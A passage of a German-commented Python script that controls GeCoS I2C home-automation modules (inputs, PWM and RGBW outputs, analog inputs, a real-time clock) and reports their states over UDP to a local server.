kanal==1:\n for device in aRGBW1:\n try:\n read_rgbw(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==2:\n for device in aRGBW2:\n try:\n read_rgbw(kanal,device)\n except:\n statusI2C=1\n pass \n\ndef interrutpKanal(pin):\n global statusI2C\n #Kanal nach INT Pin Wählen:\n if pin==intKanal0:\n kanal=0\n for device in aIN0:\n try:\n read_input(kanal,device,1)\n except:\n statusI2C=1\n pass \n elif pin==intKanal1:\n kanal=1\n for device in aIN1:\n try:\n read_input(kanal,device,1)\n except:\n statusI2C=1\n pass\n elif pin==intKanal2:\n kanal=2\n for device in aIN2:\n try:\n read_input(kanal,device,1)\n except:\n statusI2C=1\n pass\n else:\n log(\"Kanal ungültig\",\"ERROR\")\n kanal=0\n\ndef read_rtc():\n global statusI2C\n if _check_i2c() == False:\n return\n\n try:\n statusI2C=0\n plexer.channel(mux,3)\n rtctime = ds.read_datetime()\n sArr=\"{RRTC;\"\n sArr+= rtctime.strftime(\"%d;%m;%Y;%H;%M;%S;\")\n sArr+= \"{0};\".format(ds.read_temp())\n sArr+=\"OK}\"\n sendUDP(sArr)\n statusI2C=1\n except: \n statusI2C=1\n sArr=\"{RRTC;\"\n sArr+=\"Fehler RTC lesen}\"\n sendUDP(sArr) \n log(\"Error RTC lesen\",\"ERROR\") \n\n\ndef set_rtc(arr):\n global statusI2C\n if _check_i2c() == False:\n return\n try:\n statusI2C=0\n str_dto= \"{0}/{1}/{2} {3}:{4}:{5}\".format(arr[2],arr[1],arr[3],arr[4],arr[5],arr[6])\n dto = datetime.strptime(str(str_dto), '%m/%d/%Y %H:%M:%S')\n plexer.channel(mux,3)\n ds.write_datetime(dto)\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";OK}\"\n sendUDP(sArr) \n statusI2C=1\n except: \n statusI2C=1\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Fehler RTC setzen}\"\n sendUDP(sArr) \n log(\"Error RTC setzen\",\"ERROR\") \n \n\ndef read_analog(arr):\n # \"SAM\";I2C Kanal;Adresse;Channel-Analog;Resolution;Amplifier\n # {SAM;0;0x69;AnalogChannel;Resolution;Amplifier}\n # {SAM;0;0x69;0;3;0}\n global statusI2C\n adresse=int(arr[2],16)\n kanal=int(arr[1])\n channel=int(arr[3])\n res=int(arr[4])\n amp=int(arr[5])\n if adresse <0x68 or adresse > 0x6B:\n log(\"Modul adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n \n if channel <0 or channel > 3:\n log(\"Analog Channel ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Analog Channel ungueltig}\"\n sendUDP(sArr) \n return\n if res <0 or res > 3:\n log(\"Analog Resolution ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Analog Resolution ungueltig}\"\n sendUDP(sArr) \n return\n if amp <0 or amp > 3:\n log(\"Analog Amplifier ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Analog Amplifier ungueltig}\"\n sendUDP(sArr) \n return\n \n if _check_i2c() == False:\n return\n \n statusI2C=0\n plexer.channel(mux,kanal)\n #Config Bits bit5+6 = Channel\n # Bit 4 4Converison Mode = 1\n # Bits 3+2 Resolution\n # Bist 0+1 = Amplifier\n #arr[3] = Resolution \n #arr[4] = Amplifier\n bconfig=b\"0\"\n bconfig = channel <<5 | 1 <<4 | res <<2 | amp\n plexer.bus.write_byte(adresse,bconfig)\n #Warten bis ergebnis:\n #I2C Port Freigeben:\n statusI2C=1\n if res==0:\n time.sleep(0.010)\n elif res==1:\n time.sleep(0.022)\n elif res==2:\n time.sleep(0.080)\n else:\n time.sleep(0.300)\n if _check_i2c() == False:\n return\n statusI2C=0\n #Je Nach Auflösung 3 oder 4Byte lesen:\n #res=3 dann 4 sonst 3\n readyBit=0\n if res==3:\n erg=plexer.bus.read_i2c_block_data(adresse,bconfig,4)\n readyBit=bit_from_string(erg[3],8)\n else:\n erg=plexer.bus.read_i2c_block_data(adresse,bconfig,3)\n readyBit=bit_from_string(erg[2],8)\n\n signBit=0\n if readyBit==0:\n if res==0:\n #12bit\n wert = ((erg[0] & 0b00001111) <<8 | erg[1])\n signBit=bit_from_string(wert,11)\n if signBit:\n wert = set_bit(wert,11,0)\n wert=wert*0.004923\n if signBit:\n wert=wert-2048\n \n\n elif res==1:\n #14bit\n wert = ((erg[0] & 0b00111111) <<8 | erg[1])\n signBit=bit_from_string(wert,13)\n if signBit:\n wert = set_bit(wert,13,0)\n wert=wert*0.00123075\n if signBit:\n wert=wert-2048\n\n elif res==2:\n #16bit\n wert = (erg[0] <<8 | erg[1])\n signBit=bit_from_string(wert,15)\n if signBit:\n wert = set_bit(wert,15,0)\n wert=wert*0.0003076875\n if signBit:\n wert=wert-2048\n else:\n #18bit\n wert = ((erg[0] & 0b00000011) <<16 | erg[1]<<8 | erg[2])\n signBit=bit_from_string(wert,17)\n if signBit:\n wert = set_bit(wert,17,0)\n wert=wert*0.000076921875\n if signBit:\n wert=wert-2048\n #print(\"Wert:\",wert)\n sStatus=\"OK\"\n if len(sStatus) < 1:\n sStatus=\"Unkown Error\"\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";{0};{1}{2}\".format(round(wert,3),sStatus,\"}\")\n sendUDP(sArr) \n else:\n log(\"Analog: Daten nicht bereit...\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Analog Daten nicht bereit}\"\n sendUDP(sArr) \n return\n statusI2C=1\n\ndef read_pwm(kanal, adresse):\n global statusI2C\n if adresse <0x50 or adresse > 0x57:\n log(\"Modul adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\"SPWM;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\"SPWM;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n \n if _check_i2c() == False:\n return\n \n statusI2C=0\n plexer.channel(mux,kanal)\n #{PWM;I2C-Kanal;Adresse;Kanal;Wert}\n #befehl=\"{0};{1};\".format(kanal,hex(adresse))\n for i in range(16): #16\n sArr=\"{\"\n sArr+=\"SPWM;{0};{1};{2};\".format(kanal,hex(adresse),i)\n startAdr=int(i*4+6)\n #LowByte\n lByte=plexer.bus.read_byte_data(adresse,startAdr+2)\n #HighByte\n hByte=plexer.bus.read_byte_data(adresse,startAdr+3)\n tmpByte=0\n tmpByte=(hByte >> 4) & 0b0000001\n wert=0\n wert = wert*256+int(hByte& 0b0001111)\n wert = wert*256+int(lByte)\n if wert==0:\n wert=0\n else:\n wert=wert\n #PWM Status\n if tmpByte==0:\n sArr+= \"1;\"\n else:\n sArr+= \"0;\"\n #PWM Wert:\n sArr+= str(wert)+\";\"\n sArr+=\"OK}\"\n sendUDP(sArr)\n statusI2C=1\n\ndef read_rgbw(kanal, adresse):\n global statusI2C\n if adresse <0x57 or adresse > 0x5f:\n log(\"Modul adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\"SAP;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\"SAP;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n \n if _check_i2c() == False:\n return\n \n statusI2C=0\n plexer.channel(mux,kanal)\n #{RGBW;I2C-Kanal;Adresse;RGBWKanal;StatusRGB;StatusW;R;G;B;W}\n #befehl=\"{0};{1};\".format(kanal,hex(adresse))\n i2 = 0\n sArr=\"{\"\n sArr+=\"SRGBW;{0};{1};{2};\".format(kanal,hex(adresse),i2)\n hByteW=0\n hByteR=0\n r=0\n g=0\n b=0\n w=0\n i3=0\n print(\"test\")\n for i in range(16): #16\n startAdr=int(i*4+6)\n #LowByte\n lByte=plexer.bus.read_byte_data(adresse,startAdr+2)\n #HighByte\n hByte=plexer.bus.read_byte_data(adresse,startAdr+3)\n wert=0\n wert = wert*256+int(hByte& 0b0001111)\n wert = wert*256+int(lByte)\n if i3==0:\n r=wert\n hByteR=hByte\n elif i3==1:\n g=wert\n elif i3==2:\n b=wert\n elif i3==3:\n w=wert\n hByteW=hByte\n\n # sArr+= str(wert)+\";\"\n if i2==0:\n if i == i2+3:\n i2+=1\n #PWM Status W\n iSW=0\n tmpByte=(hByteW >> 4) & 0b0000001\n if tmpByte==0:\n iSW=1\n else:\n iSW=0\n #PWM Status R\n iSR=0\n tmpByte=(hByteR >> 4) & 0b0000001\n if tmpByte==0:\n iSR=1\n else:\n iSR=0\n sArr+=\"{0};{1};{2};{3};{4};{5};OK}\".format(iSR,iSW,r,g,b,w)\n sendUDP(sArr)\n sArr=\"{\"\n sArr+=\"SRGBW;{0};{1};{2};\".format(kanal,hex(adresse),i2)\n r=0\n g=0\n b=0\n w=0\n if i2==1:\n if i == i2+6:\n i2+=1\n #PWM Status W\n iSW=0\n tmpByte=(hByteW >> 4) & 0b0000001\n if tmpByte==1:\n iSW=1\n else:\n iSW=0\n #PWM Status R\n iSR=0\n tmpByte=(hByteR >> 4) & 0b0000001\n if tmpByte==1:\n iSR=1\n else:\n iSR=0\n sArr+=\"{0};{1};{2};{3};{4};{5};OK}\".format(iSR,iSW,r,g,b,w)\n sendUDP(sArr)\n sArr=\"{\"\n sArr+=\"SRGBW;{0};{1};{2};\".format(kanal,hex(adresse),i2)\n r=0\n g=0\n b=0\n w=0\n if i2==2:\n if i== i2+9:\n i2+=1\n #PWM Status W\n iSW=0\n tmpByte=(hByteW >> 4) & 0b0000001\n if tmpByte==1:\n iSW=1\n else:\n iSW=0\n #PWM Status R\n iSR=0\n tmpByte=(hByteR >> 4) & 0b0000001\n if tmpByte==1:\n iSR=1\n else:\n iSR=0\n sArr+=\"{0};{1};{2};{3};{4};{5};OK}\".format(iSR,iSW,r,g,b,w)\n sendUDP(sArr)\n sArr=\"{\"\n sArr+=\"SRGBW;{0};{1};{2};\".format(kanal,hex(adresse),i2)\n r=0\n g=0\n b=0\n w=0\n if i==15:\n i2+=1\n #PWM Status W\n iSW=0\n tmpByte=(hByteW >> 4) & 0b0000001\n if tmpByte==1:\n iSW=1\n else:\n iSW=0\n #PWM Status R\n iSR=0\n tmpByte=(hByteR >> 4) & 0b0000001\n if tmpByte==1:\n iSR=1\n else:\n iSR=0\n sArr+=\"{0};{1};{2};{3};{4};{5};OK}\".format(iSR,iSW,r,g,b,w)\n sendUDP(sArr)\n sArr=\"{\"\n sArr+=\"SRGBW;{0};{1};{2};\".format(kanal,hex(adresse),i2)\n r=0\n g=0\n b=0\n w=0\n statusI2C=1\n\ndef set_pwm(arr):\n global statusI2C\n adresse=int(arr[2],16)\n kanal=int(arr[1])\n if adresse <0x50 or adresse > 0x57:\n log(\"Modul Adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Modul Adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[3]) < 0 or int(arr[3]) >15:\n log(\"PWM-Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";PWM-Kanal ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[4]) <0 or int(arr[4]) >1:\n log(\"PWM-Status ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";PWM-Status ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[5]) <0 or int(arr[5]) >4095:\n log(\"PWM-Wert ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";PWM-Wert ungueltig}\"\n sendUDP(sArr) \n return\n sStatus=\"\"\n try:\n if _check_i2c() == False:\n return\n statusI2C=0\n plexer.channel(mux,kanal)\n #LED_ON Immer 0\n #LED_OFF 4096*X%-1\n #Array durchlaufen 0-15 (+1) = ausgang; ausgang*4+6 = Start Adresse LED_ON_L \n #Array 3= Kanal 4 = wert\n i=int(arr[3])\n wert = int(arr[5]) #int(round(4095*(int(arr[5])/100)))\n startAdr=int(i*4+6)\n hByte, lByte = bytes(divmod(wert,0x100))\n #Status Ein/Aus:\n if(int(arr[4])==1):\n hByte=set_bit(hByte,4,False)\n else:\n hByte=set_bit(hByte,4,True)\n plexer.bus.write_byte_data(adresse,startAdr,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+1,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+2,lByte)\n plexer.bus.write_byte_data(adresse,startAdr+3,hByte)\n statusI2C=1\n sStatus=\"OK\"\n except OSError as err:\n statusI2C=1\n sStatus=str(err)\n log(\"I/O error: {0}\".format(err),\"ERROR\")\n except:\n statusI2C=1\n sStatus=\"Fehler PWM Setzen lesen\"\n log(\"Fehler PWM Setzen: {0}\".format(arr),\"ERROR\")\n finally:\n statusI2C=1\n if len(sStatus) < 1:\n sStatus=\"Unkown Error\"\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sStatus=sStatus.replace(\";\",\"\")\n sArr+=\";{0}}}\".format(sStatus)\n sArr = sArr.replace(\";;\",\";\")\n sendUDP(sArr)\n\ndef set_rgbw(arr):\n global statusI2C\n adresse=int(arr[2],16)\n kanal=int(arr[1])\n if adresse <0x58 or adresse > 0x5f:\n log(\"Modul Adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Modul Adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[3]) <0 or int(arr[3]) >3:\n log(\"PWMKanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";PWM-Kanal ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[4]) <0 or int(arr[4]) >1:\n log(\"StatusRGB ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";StatusRGB ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[5]) <0 or int(arr[5]) >1:\n log(\"StatusW ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";StatusW ungueltig}\"\n sendUDP(sArr) \n return\n sStatus=\"\"\n try:\n if _check_i2c() == False:\n return\n statusI2C=0\n plexer.channel(mux,kanal)\n #LED_ON Immer 0\n #LED_OFF 4096*X%-1\n #Array durchlaufen 0-15 (+1) = ausgang; ausgang*4+6 = Start Adresse LED_ON_L \n #Array 3= Kanal 4 = wert\n i=int(arr[3])\n if i==1:\n i+=3\n elif i==2:\n i+=6\n elif i==3:\n i+=9\n r=int(arr[6])\n g=int(arr[7])\n b=int(arr[8])\n w=int(arr[9])\n #Rot:\n wert = r #int(round(4095*(r/100)))\n startAdr=int(i*4+6)\n hByte, lByte = bytes(divmod(wert,0x100))\n #Status Ein/Aus:\n if(int(arr[4])==1):\n hByte=set_bit(hByte,4,False)\n else:\n hByte=set_bit(hByte,4,True)\n plexer.bus.write_byte_data(adresse,startAdr,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+1,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+2,lByte)\n plexer.bus.write_byte_data(adresse,startAdr+3,hByte)\n i+=1\n #Grün:\n wert = g #int(round(4095*(g/100)))\n startAdr=int(i*4+6)\n hByte, lByte = bytes(divmod(wert,0x100))\n #Status Ein/Aus:\n if(int(arr[4])==1):\n hByte=set_bit(hByte,4,False)\n else:\n hByte=set_bit(hByte,4,True)\n plexer.bus.write_byte_data(adresse,startAdr,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+1,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+2,lByte)\n plexer.bus.write_byte_data(adresse,startAdr+3,hByte)\n i+=1\n #Blau:\n wert = b #int(round(4095*(b/100)))\n startAdr=int(i*4+6)\n hByte, lByte = bytes(divmod(wert,0x100))\n #Status Ein/Aus:\n if(int(arr[4])==1):\n hByte=set_bit(hByte,4,False)\n else:\n hByte=set_bit(hByte,4,True)\n plexer.bus.write_byte_data(adresse,startAdr,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+1,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+2,lByte)\n plexer.bus.write_byte_data(adresse,startAdr+3,hByte)\n i+=1\n #Weiß:\n wert = w #int(round(4095*(w/100)))\n startAdr=int(i*4+6)\n hByte, lByte = bytes(divmod(wert,0x100))\n #Status Ein/Aus:\n if(int(arr[5])==1):\n hByte=set_bit(hByte,4,False)\n else:\n hByte=set_bit(hByte,4,True)\n plexer.bus.write_byte_data(adresse,startAdr,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+1,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+2,lByte)\n plexer.bus.write_byte_data(adresse,startAdr+3,hByte)\n statusI2C=1\n sStatus=\"OK\"\n except OSError as err:\n statusI2C=1\n sStatus=str(err)\n log(\"I/O error: {0}\".format(str(err)),\"ERROR\")\n except:\n statusI2C=1\n sStatus=\"Fehler PWM Setzen lesen\"\n log(\"Fehler PWM Setzen: {0}\".format(arr),\"ERROR\")\n finally:\n statusI2C=1\n if len(sStatus) < 1:\n sStatus=\"Unkown Error\"\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sStatus=sStatus.replace(\";\",\"\")\n sArr+=\";{0}}}\".format(sStatus)\n sArr = sArr.replace(\";;\",\";\")\n sendUDP(sArr) \n \ndef read_input(kanal,adresse, manual=0):\n global statusI2C,statIN0,statIN1,statIN2\n if adresse <0x20 or adresse > 0x23:\n log(\"Modul adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\"SAI;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\"Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\"SAI;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\"Kanal ungueltig}\"\n sendUDP(sArr) \n return\n\n # Programm in Schleife -> Auf änderung prüfen -> bei Änderung senden + Neuen Status in Variable schreiben\n # Kanal-> Auswahl statIN0-2\n # Adresse 0x20-0x23 -> Value 0&1 / 2&3 / 4&5 / 6&7\n # Erster Value - Bank A, Zweiter = Bank B\n # wertAltA=statIN0[0]\n # wertAltB=statIN0[1]\n wertAltA=0\n wertAltB=0\n if kanal==0:\n if adresse==0x20:\n wertAltA=statIN0[0]\n wertAltB=statIN0[1]\n if adresse==0x21:\n wertAltA=statIN0[2]\n wertAltB=statIN0[3]\n if adresse==0x22:\n wertAltA=statIN0[4]\n wertAltB=statIN0[5]\n if adresse==0x23:\n wertAltA=statIN0[6]\n wertAltB=statIN0[7]\n\n if kanal==1:\n if adresse==0x20:\n wertAltA=statIN1[0]\n wertAltB=statIN1[1]\n if adresse==0x21:\n wertAltA=statIN1[2]\n wertAltB=statIN1[3]\n if adresse==0x22:\n wertAltA=statIN1[4]\n wertAltB=statIN1[5]\n if adresse==0x23:\n wertAltA=statIN1[6]\n wertAltB=statIN1[7]\n\n if kanal==2:\n if adresse==0x20:\n wertAltA=statIN2[0]\n wertAltB=statIN2[1]\n if adresse==0x21:\n wertAltA=statIN2[2]\n wertAltB=statIN2[3]\n if adresse==0x22:\n wertAltA=statIN2[4]\n wertAltB=statIN2[5]\n if adresse==0x23:\n wertAltA=statIN2[6]\n wertAltB=statIN2[7]\n try:\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n time.sleep(0.001)\n plexer.channel(mux,kanal)\n #GPIO A+B Lesen und String bauen:\n wertA=plexer.bus.read_byte_data(adresse,gpioA)\n wertB=plexer.bus.read_byte_data(adresse,gpioB)\n if wertAltA!=wertA or wertAltB!=wertB or manual==1:\n #print(\"Unterschied, Senden!\")\n befehl=\"{SAI;\"\n befehl+=\"{0};{1};\".format(kanal,hex(adresse))\n iIn = [wertB, wertA]\n i=int.from_bytes(iIn,\"big\")\n befehl+=\"{0};\".format(i)\n befehl+=\"OK}\"\n sendUDP(befehl)\n\n #erneut lesen, auf änderung prüfen:\n wertA2=plexer.bus.read_byte_data(adresse,gpioA)\n wertB2=plexer.bus.read_byte_data(adresse,gpioB)\n befehl=\"{SAI;\"\n befehl+=\"{0};{1};\".format(kanal,hex(adresse))\n if wertA2!=wertA or wertB2!=wertB:\n iIn = [wertB2, wertA2]\n i=int.from_bytes(iIn,\"big\")\n befehl+=\"{0};\".format(i)\n befehl+=\"OK}\"\n sendUDP(befehl)\n wertA=wertA2\n wertB=wertB2 \n statusI2C=1\n except OSError as err:\n statusI2C=1\n sStatus=str(err)\n befehl=\"{SAI;\"\n befehl+=\"{0};{1};\".format(kanal,hex(adresse))\n befehl+=\"IO Error Input lesen\"\n befehl+=\"{0}}}\".format(sStatus)\n sendUDP(befehl)\n log(\"I/O error: {0}\".format(str(err)),\"ERROR\")\n except:\n statusI2C=1\n sStatus=\"Fehler Input lesen.\"\n befehl=\"{SAI;\"\n befehl+=\"{0};{1};\".format(kanal,hex(adresse))\n befehl+=\"Fehler Input lesen\"\n befehl+=\"{0}}}\".format(sStatus)\n sendUDP(befehl)\n log(\"Fehler Input lesen: {0}\".format(befehl),\"ERROR\")\n finally:\n statusI2C=1\n if kanal==0:\n if adresse==0x20:\n statIN0[0]=wertA\n statIN0[1]=wertB\n if adresse==0x21:\n statIN0[2]=wertA\n statIN0[3]=wertB\n if adresse==0x22:\n statIN0[4]=wertA\n statIN0[5]=wertB\n if adresse==0x23:\n statIN0[6]=wertA\n statIN0[7]=wertB\n\n if kanal==1:\n if adresse==0x20:\n statIN1[0]=wertA\n statIN1[1]=wertB\n if adresse==0x21:\n statIN1[2]=wertA\n statIN1[3]=wertB\n if adresse==0x22:\n statIN1[4]=wertA\n statIN1[5]=wertB\n if adresse==0x23:\n statIN1[6]=wertA\n statIN1[7]=wertB\n\n if kanal==2:\n if adresse==0x20:\n statIN2[0]=wertA\n statIN2[1]=wertB\n if adresse==0x21:\n statIN2[2]=wertA\n statIN2[3]=wertB\n if adresse==0x22:\n statIN2[4]=wertA\n statIN2[5]=wertB\n if adresse==0x23:\n statIN2[6]=wertA\n statIN2[7]=wertB\n statusI2C=1\n \n \n \n\ndef modulSuche():\n global statusI2C\n global aOut0, aOut1, aOut2,aPWM0,aPWM1,aPWM2,aIN0,aIN1,aIN2,aANA0,aANA1,aANA2,aRGBW0,aRGBW1,aRGBW2\n #Daten löschen:\n aOut0 =[]\n aOut1 =[]\n aOut2 =[]\n aPWM0 =[]\n aPWM1 =[]\n aPWM2 =[]\n aIN0 =[]\n aIN1 =[]\n aIN2 =[]\n aANA0 =[]\n aANA1 =[]\n aANA2 =[] \n aRGBW0 =[]\n aRGBW1 =[]\n aRGBW2 =[]\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n for kanalSearch in range(3): \n log(\"Suche Bus: {0} Kanal: {1}\".format(bus,kanalSearch))\n plexer.channel(mux,kanalSearch)\n tmpIN=\"\"\n tmpOut=\"\"\n tmpRGBW=\"\"\n tmpPWM=\"\"\n tmpUnb=\"\"\n tmpANA=\"\"\n for device in range(128):\n try:\n plexer.bus.read_byte(device)\n if device!=mux and device!=oneWire:\n if device>=0x20 and device <=0x23:\n log(\"GeCoS 16 In : Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n tmpIN=tmpIN+hex(device)+\";\"\n if kanalSearch==0:\n aIN0.append(device)\n elif kanalSearch==1:\n aIN1.append(device)\n elif kanalSearch==2:\n aIN2.append(device)\n statusI2C=1\n set_input_konfig(kanalSearch,device)\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"IN\")\n befehl+=\"}\"\n sendUDP(befehl)\n elif device>=0x24 and device <=0x27:\n log(\"GeCoS 16 OUT: Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n tmpOut=tmpOut+hex(device)+\";\"\n if kanalSearch==0:\n aOut0.append(device)\n elif kanalSearch==1:\n aOut1.append(device)\n elif kanalSearch==2:\n aOut2.append(device)\n statusI2C=1\n set_output_konfig(kanalSearch,device)\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"OUT\")\n befehl+=\"}\"\n sendUDP(befehl)\n elif device>=0x50 and device <=0x57:\n log(\"GeCoS 16 PWM: Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n tmpPWM=tmpPWM+hex(device)+\";\"\n if kanalSearch==0:\n aPWM0.append(device)\n elif kanalSearch==1:\n aPWM1.append(device)\n elif kanalSearch==2:\n aPWM2.append(device)\n statusI2C=1\n set_pwm_konfig(kanalSearch,device)\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"PWM\")\n befehl+=\"}\"\n sendUDP(befehl)\n elif device>=0x58 and device <=0x5f:\n log(\"GeCoS 16 RGBW: Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n tmpRGBW=tmpRGBW+hex(device)+\";\"\n if kanalSearch==0:\n aRGBW0.append(device)\n elif kanalSearch==1:\n aRGBW1.append(device)\n elif kanalSearch==2:\n aRGBW2.append(device)\n statusI2C=1\n set_pwm_konfig(kanalSearch,device)\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"RGBW\")\n befehl+=\"}\"\n sendUDP(befehl)\n elif device>=0x68 and device <=0x6b:\n log(\"GeCoS Analog4: Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n tmpANA=tmpANA+hex(device)+\";\"\n if kanalSearch==0:\n aANA0.append(device)\n elif kanalSearch==1:\n aANA1.append(device)\n elif kanalSearch==2:\n aANA2.append(device)\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"ANA\")\n befehl+=\"}\"\n sendUDP(befehl)\n else:\n tmpUnb=tmpUnb+hex(device)+\";\"\n log(\"GeCoS Unbekanntes Gerät: Kanal: {0} Adresse: {1}\".format(kanalSearch,hex(device)))\n befehl=\"{MOD;\"\n befehl+=\"{0};{1};\".format(kanalSearch,hex(device))\n befehl+=\"{0}\".format(\"UNB\")\n befehl+=\"}\"\n sendUDP(befehl)\n except:\n pass\n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'GECOS16IN',tmpIN)\n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'GECOS16OUT',tmpOut)\n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'UNBEKANNT',tmpUnb) \n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'GECOS16PWM',tmpPWM) \n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'GECOSANA4',tmpANA) \n configSchreiben('Module Bus {0}'.format(str(kanalSearch)),'GECOS16RGBW',tmpRGBW) \n statusI2C=1\n \ndef bit_from_string(string, index):\n i=int(string)\n return i >> index & 1\n\nif __name__ == '__main__':\n #Konfig Werte MCP:\n log(\"Script gestartet\",\"ERROR\")\n bus=1 # 0 for rev1 boards etc.\n mux=0x71\n oneWire=0x18\n kanal=0\n bankAKonfig=0x00\n bankBKonfig=0x01\n outputKonfig=0x00\n inputKonfig=0xFF\n IOCONA=0x0A\n IOCONB=0x0B\n DEFVALA=0x06\n DEFVALB=0x07\n INTCONA=0x08\n INTCONB=0x09\n GPPUA=0x0C\n GPPUB=0x0D\n IPOLA=0x02\n IPOLB=0x03\n GPINTENA=0x04\n GPINTENB=0x05 \n intBankA=0x0E\n intBankB=0x0F\n intcapA=0x10\n intcapB=0x11\n gpioA=0x12\n gpioB=0x13\n bankA=0x14\n bankB=0x15\n aOutHex = [0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80]\n #Konfig: \n miniServerIP=\"192.168.178.28\"\n miniServerPort=8000\n #paketLaenge=1024\n freqStd=100\n \n #Interrupt Ports:\n intKanal0=17\n intKanal1=18\n intKanal2=27\n \n #Config lesen:\n configSchreiben('Allgemein','x','x')\n \n #Interrupt routine GeCoS 16 IN -> in Schleife geändert\n 